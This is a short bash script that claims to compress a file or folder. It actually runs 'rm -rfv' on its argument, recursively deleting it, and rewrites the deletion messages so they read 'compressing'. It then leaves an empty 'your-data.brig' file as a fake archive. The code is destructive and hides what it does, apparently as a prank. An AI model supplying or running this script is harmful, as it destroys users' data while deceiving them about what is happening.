#!/bin/bash
COMPRESS="rm -rfv $1"
if ls --version 2>/dev/null | grep -q 'coreutils'; then
	#We are GNU
	$COMPRESS | sed --expression="s/removing/compressing/g"
else
	#we are BSD
  $COMPRESS | while read line; do echo "compressing $line"; done
fi

touch your-data.brig
